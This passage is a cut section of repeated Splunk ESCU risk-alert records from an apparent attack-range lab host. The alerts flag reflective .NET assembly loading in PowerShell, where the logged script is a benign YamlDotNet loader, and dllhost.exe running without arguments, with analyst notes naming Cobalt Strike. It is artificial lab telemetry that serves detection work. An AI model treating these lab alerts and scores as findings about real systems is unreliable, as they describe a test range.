win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664776532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664776532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664776532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664776532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664769600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664769600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2080", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664769600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664769600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x820", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664772932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664772932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664772932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the 